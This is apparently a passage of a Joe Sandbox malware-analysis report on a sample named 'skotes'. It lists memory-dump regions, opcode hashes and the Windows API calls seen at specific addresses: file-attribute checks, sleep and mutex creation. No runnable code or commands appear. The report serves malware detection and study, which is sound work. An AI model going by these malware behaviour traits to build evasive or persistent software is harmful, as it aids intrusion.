                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 362c6d2b847ef5038d6083b78743442d13a60fbc7604fdf00865be08afaf3116
                                                                                                                                                                                                                                              • Instruction ID: 81e62a5b622e44725d2dd1f3eba8d239876b99b9589188fb6d00ddcf9db80901
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 362c6d2b847ef5038d6083b78743442d13a60fbc7604fdf00865be08afaf3116
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01317B317142449BEB0CDB78DD8976DFBF2EB85310F24829AE014D73E6E77A99808761
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BD9CDD
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 0b62be6f18be1182b5ea6b5cd9e7976f44d17324d750a12221f778d82f3f5847
                                                                                                                                                                                                                                              • Instruction ID: f7c5ea1342c71e086c4d280a432c5f38697e39d42be05a16f9ec3a49d4b6c25a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b62be6f18be1182b5ea6b5cd9e7976f44d17324d750a12221f778d82f3f5847
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A23126327141448BEB18DB78D8C87ADF7F2EB86310F2446AAE014E73D5E77A99808761
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BD9F47
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 52ce83724cee47edbfe34603c1a936691ca0c999e64322e62318d094551bbcf6
                                                                                                                                                                                                                                              • Instruction ID: 9739005e48bebe7ad120b64a2493c4c0acfa66c8cf404a32b3ee9e153502d5cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52ce83724cee47edbfe34603c1a936691ca0c999e64322e62318d094551bbcf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B316B717001449BEB1CDB78DC987ADF7F2EB85310F20469AE014D73D5E77A99848762
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA07C
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 7d37159179dc0383dfa9856e93a50ef6b28dd2b08cb3527b914674f41217c59a
                                                                                                                                                                                                                                              • Instruction ID: 25288cb4bc68f3f8d7398c7e2a0e7cc4faf1fe58b73bca14ea37cad67590f263
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d37159179dc0383dfa9856e93a50ef6b28dd2b08cb3527b914674f41217c59a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C3148327101449BEB08DB78DDC976DF7F2EB86310F24829AE014E73D5E77A99848762
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA1B1
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
